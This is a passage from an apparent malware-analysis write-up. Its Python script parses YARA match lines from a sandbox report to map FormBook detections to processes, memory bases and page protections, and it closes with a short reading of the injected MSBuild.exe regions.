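# Win32 page protection constants from winnt.h (low byte of the field).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<run>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\."
    r"(?P<n>\d+)\.(?P<raw>raw\.)?unpack$"
)


@dataclass
class YaraHit:
    proc: int                # analysis process number (assumed, not OS PID)
    run: int
    kind: str                # "memory" or "unpacked"
    base: int                # region / image base address
    protect: Optional[int]   # PAGE_* value; None for unpacked PE entries
    image: Optional[str]     # host image name; only known for unpacked PEs

    @property
    def protection_name(self) -> Optional[str]:
        if self.protect is None:
            return None
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def executable(self) -> bool:
        # Any PAGE_EXECUTE* protection (0x10..0x80). A writable+executable
        # private region is the usual footprint of injected / hollowed code.
        return self.protect is not None and bool(self.protect & 0xF0)


def parse_source(line: str) -> Optional[YaraHit]:
    """Parse one 'Source: Yara match File source: <id>, type: <T>' line."""
    m = re.search(r"File source:\s*(\S+),\s*type:\s*(\w+)", line)
    if not m:
        return None
    ident = m.group(1)
    if ident.endswith(".sdmp"):
        g = SDMP_RE.match(ident)
        if not g:
            return None
        return YaraHit(int(g["proc"], 16), int(g["run"], 16), "memory",
                       int(g["base"], 16), int(g["protect"], 16), None)
    g = UNPACK_RE.match(ident)
    if not g:
        return None
    return YaraHit(int(g["proc"]), int(g["run"]), "unpacked",
                   int(g["base"], 16), None, g["image"])


def summarize(report_lines):
    """Group hits by process; record host image and executable region bases."""
    procs = {}
    for line in report_lines:
        hit = parse_source(line)
        if hit is None:
            continue
        entry = procs.setdefault(
            hit.proc, {"image": None, "hits": 0, "executable_regions": []})
        entry["hits"] += 1
        if hit.image:
            entry["image"] = hit.image
        if hit.executable:
            entry["executable_regions"].append(hit.base)
    return procs


# Lines copied from the Yara section of this report.
REPORT_LINES = [
    "Source: Yara match File source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    for proc, info in sorted(summarize(REPORT_LINES).items()):
        regions = ", ".join(f"0x{b:x}" for b in info["executable_regions"]) or "none"
        print(f"process {proc} ({info['image'] or 'unnamed'}): "
              f"{info['hits']} hits, executable regions: {regions}")
```

Read against the report: process 0 (the submitted sample) holds FormBook only in a `PAGE_READWRITE` region at 0x3CE6000, consistent with a loader keeping the decrypted payload in data memory before injecting it; process 7 (MSBuild.exe) holds it in `PAGE_EXECUTE_READWRITE` memory at 0x400000, the hollowed image base that the `7.2.MSBuild.exe.400000.0.unpack` entry also points to; process 15, whose image name this section does not give, shows the same RWX footprint at 0x41B0000.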